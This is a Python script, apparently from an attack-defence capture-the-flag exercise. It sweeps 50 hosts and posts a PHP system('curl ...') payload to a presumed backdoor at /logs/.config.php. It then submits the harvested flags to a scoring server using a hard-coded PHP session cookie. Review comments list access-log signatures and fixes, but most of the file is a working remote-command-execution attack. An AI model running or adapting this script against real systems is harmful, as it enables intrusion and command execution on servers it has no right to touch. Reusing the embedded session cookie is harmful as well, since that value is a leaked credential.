import requests
def get_flag():
    """Collect one short response per host and append it to ``flag.txt``.

    For each i in 1..50 this POSTs to ``http://4.3.<i>.101/logs/.config.php``
    with one form field named ``1`` holding a PHP ``system('curl ...')``
    statement and a ``User-Agent`` of ``flag``. Every decoded response
    shorter than 50 characters is appended to ``flag.txt`` and printed.

    NOTE(review): the endpoint presumably evaluates the posted field as PHP,
    i.e. a backdoor already present on the hosts of an attack-defence
    exercise. That is inferred from the payload, not shown in this file.
    Seen from the defending side the request is distinctive: a POST to a
    dot-file under ``logs/``, a form key ``1`` whose value contains
    ``system(``, and the literal ``User-Agent: flag``. Each is a usable
    access-log or WAF signature. The durable fix is removing the file and
    denying script execution under ``logs/``.
    """
    ua = {'User-Agent': 'flag'}
    form = {1: "system('curl http://172.21.0.1/Getkey');"}
    for host_octet in range(1, 51):
        target = 'http://4.3.{}.101/logs/.config.php'.format(host_octet)
        reply = requests.post(target, data=form, headers=ua)
        text = reply.content.decode('utf-8')
        # Length is the only filter: an empty body or a short error page is
        # recorded exactly like a real flag.
        if len(text) >= 50:
            continue
        with open(r'flag.txt', 'a+') as out:
            out.write(text + '\n')
        print(text)

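def submit_flag():
    """Submit every non-empty line of ``flag.txt`` as an ``answer`` form field.

    Each line is POSTed to ``http://172.21.0.1/Title/TitleView/savecomprecord``
    (presumably the exercise's answer-submission endpoint) and the response
    body and status code are printed. A failed request is reported and the
    loop moves on to the next flag.

    Raises:
        OSError: if ``flag.txt`` cannot be opened.
    """
    url = 'http://172.21.0.1/Title/TitleView/savecomprecord'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
        "X-Requested-With": "XMLHttpRequest",
        "Host": "172.21.0.1",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://172.21.0.1/",
        # NOTE(review): a session id is hard-coded here and was published with
        # the script. Treat it as disclosed: invalidate the session and load
        # the value from the environment or an untracked config file instead.
        "Cookie": "PHPSESSID=eas4l327930tm7nbvscj4fvi93",
    }
    # The context manager closes the file even if a request raises.
    with open('flag.txt') as flag_file:
        for line in flag_file:
            flag = line.rstrip('\n')
            # Blank lines come from empty responses stored in the file.
            # Submitting them only produces noise on the scoring side.
            if not flag.strip():
                continue
            try:
                # Bounded wait so one stalled connection cannot hang the run.
                r = requests.post(url, data={"answer": flag},
                                  headers=headers, timeout=10)
            except requests.RequestException as exc:
                # Still best-effort, but no longer silent. A bare ``except``
                # would also have swallowed KeyboardInterrupt.
                print('submit failed for %r: %s' % (flag, exc))
                continue
            print(r.text)
            print(r.status_code)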
# Script entry point: submit_flag() reads the flag.txt that get_flag() appends
# to, so collection runs first.
if __name__ == "__main__":
    get_flag()
    submit_flag()